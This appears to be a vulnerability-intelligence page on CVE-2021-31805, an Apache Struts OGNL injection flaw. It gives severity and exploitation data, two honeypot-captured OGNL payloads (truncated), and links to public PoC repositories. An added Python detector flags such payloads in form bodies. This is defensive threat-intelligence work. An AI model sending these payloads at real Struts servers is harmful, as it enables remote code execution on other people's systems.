KEVIntel

CVE-2021-31805

CVSS 9.8 Critical · PUBLISHED

Forced OGNL evaluation, when applied to raw, unvalidated user input in tag attributes, may lead to RCE.

Not yet in CISA KEV

Tags: Exploited in the wild · Active exploitation observed · PoC available · Remote · Low complexity · No user interaction · Unauthenticated

Vendor: Apache Software Foundation
Product: Apache Struts
Published: Apr 12, 2022
EPSS: 93.8% · 100th percentile


Description

The fix issued for CVE-2020-17530 was incomplete, so in Apache Struts 2.0.0 through 2.5.29 some tag attributes could still perform a double evaluation if a developer applied forced OGNL evaluation using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to remote code execution and security degradation.


Weaknesses (CWE)

  • Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')

CVSS Scores

CVSS v3.1 9.8 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v2.0 7.5 High

AV:N/AC:L/Au:N/C:P/I:P/A:P

Exploitation Status

Exploited in the wild

Recorded 2026-06-12 00:32:51 UTC · KEVIntel

Active exploitation observed

Recorded 2026-06-12 00:32:51 UTC · KEVIntel sensor

Proof of concept available

Recorded 2022-04-15 04:23:44 UTC · GitHub

Observed Exploitation Attempts

Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.

High confidence · Active exploitation observed

  • Attempts observed: 2
  • Unique attacker IPs: 2
  • Attacker countries: 🇪🇪 🇸🇬
  • Sensors observed: 2

Exploitation Attempts Over the Last 30 Days

First observed 2026-06-12 00:32 UTC · Last observed 2026-06-15 08:44 UTC

Recent Attempts

Showing observations from the last 30 days.

Observation 1

  • Attack time: 2026-06-15 08:44 UTC (about 10 hours ago)
  • Attacker: 🇸🇬 77.93.89.98 · Singapore, Singapore
  • Sensor: 🇪🇺 Splunk Enterprise
  • Request: POST /
  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
  • Confidence: High
  • Payload fingerprint: sha256:3aceb561177b9ef0fa31d4039eb13453981a3eb62e14db958de5233d12d576ea
  • Payload: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id" %{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.col
  • Source: KEVIntel Honeypot

Observation 2

  • Attack time: 2026-06-12 00:32 UTC (4 days ago)
  • Attacker: 🇪🇪 109.206.241.94 · Tallinn, Harjumaa, Estonia
  • Sensor: 🇺🇸 Ivanti Sentry
  • Request: POST /
  • User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15
  • Confidence: High
  • Payload fingerprint: sha256:e3c215a369448b8c88f0a105b447f9e35abd212fb586f3af0309b8bdb190d54e
  • Payload: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id" %{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.coll
  • Source: KEVIntel Honeypot
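A defender-side example added here (it is not part of the KEVIntel page and not code from any Struts project): a small Python detector that parses a multipart/form-data body of the kind captured by the honeypot above and flags form-field values that combine forced OGNL evaluation (`%{`) with the indicators visible in the observed payload (`#request` context access, `@class@` static references, `BeanMap`, `struts.valueStack`). The boundary string, the two sample bodies and the indicator list are constructed for illustration; the malicious sample is modelled on the page's observation but shortened, and the scoring is a simple indicator count rather than any product's rule.

```python
import re
from typing import Dict, List, Tuple

# Constructed boundary (the body prefix "--" plus the Content-Type boundary value).
BOUNDARY = "----WebKitFormBoundaryl7d1B1aGsV2wcZwF"

# Constructed sample modelled on the honeypot observation: forced OGNL
# evaluation inside the "id" form field. Tail shortened for the example.
SAMPLE_BODY = (
    "------WebKitFormBoundaryl7d1B1aGsV2wcZwF\r\n"
    'Content-Disposition: form-data; name="id"\r\n'
    "\r\n"
    "%{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + "
    "(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) }\r\n"
    "------WebKitFormBoundaryl7d1B1aGsV2wcZwF--\r\n"
)

# Constructed benign sample: the same field carrying an ordinary value.
BENIGN_BODY = (
    "------WebKitFormBoundaryl7d1B1aGsV2wcZwF\r\n"
    'Content-Disposition: form-data; name="id"\r\n'
    "\r\n"
    "42\r\n"
    "------WebKitFormBoundaryl7d1B1aGsV2wcZwF--\r\n"
)

# Forced OGNL evaluation marker from the CVE description.
FORCED_EVAL = re.compile(r"%\{")

# Indicators drawn from the observed payload (illustrative list, not exhaustive).
OGNL_INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("static_access", re.compile(r"@[\w.]+@")),                      # @pkg.Class@ static reference
    ("context_ref", re.compile(r"#(?:request|context|application|session|parameters)\b")),
    ("beanmap", re.compile(r"\bBeanMap\b")),
    ("valuestack", re.compile(r"struts\.valueStack")),
]


def parse_multipart(body: str, boundary: str) -> Dict[str, str]:
    """Minimal multipart/form-data parser: returns {field name: raw value}.

    Only what the example needs: splits on the boundary, reads the
    Content-Disposition name, and treats everything after the blank line as value.
    """
    fields: Dict[str, str] = {}
    delimiter = "--" + boundary
    for part in body.split(delimiter):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


def score_field(value: str) -> Tuple[int, List[str]]:
    """Score one field value: 0 unless it carries %{, otherwise 1 + indicator hits."""
    if not FORCED_EVAL.search(value):
        return 0, []
    hits = ["forced_eval"]
    for name, pattern in OGNL_INDICATORS:
        if pattern.search(value):
            hits.append(name)
    return len(hits), hits


def detect_ognl_injection(body: str, boundary: str) -> List[Dict[str, object]]:
    """Return one finding per form field whose value looks like forced OGNL evaluation."""
    findings = []
    for name, value in parse_multipart(body, boundary).items():
        score, hits = score_field(value)
        if score:
            findings.append({"field": name, "score": score, "indicators": hits})
    return findings


if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(label, detect_ognl_injection(body, BOUNDARY))
```

The score is deliberately coarse: a lone `%{` in a form field is worth logging on its own, while the additional indicators separate a stray template string from a request shaped like the ones the sensors recorded.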

Known Exploited Vulnerability Sources

Catalogues that list this CVE as a known exploited vulnerability.

  • KEVIntel (first) · Added 2026-06-12 00:32 UTC

Scanner Integrations

Potential Proof of Concepts

These PoCs are unverified and could contain malware. Use at your own risk.

z92g/CVE-2021-31805

github · Created 2022-07-10 14:48:52 UTC · 6 stars

S2-061/S2-062 Struts2 remote command execution vulnerability PoC & EXP

aeyesec/CVE-2021-31805

github · Created 2022-04-15 16:09:52 UTC · 5 stars

PoC for CVE-2021-31805 (Apache Struts2)

Axx8/Struts2_S2-062_CVE-2021-31805

github · Created 2022-04-15 10:28:29 UTC · 11 stars

Apache Struts2 S2-062 remote code execution vulnerability (CVE-2021-31805) | reverse shell

Wrin9/CVE-2021-31805

github · Created 2022-04-15 04:23:44 UTC · 35 stars

S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE

CVE-2021-31805

nuclei · Created Unknown

Timeline

  • Added to KEVIntel

  • Detected by Nuclei

  • Proof of Concept Exploit Available

  • CVE Published to Public

  • CVE ID Reserved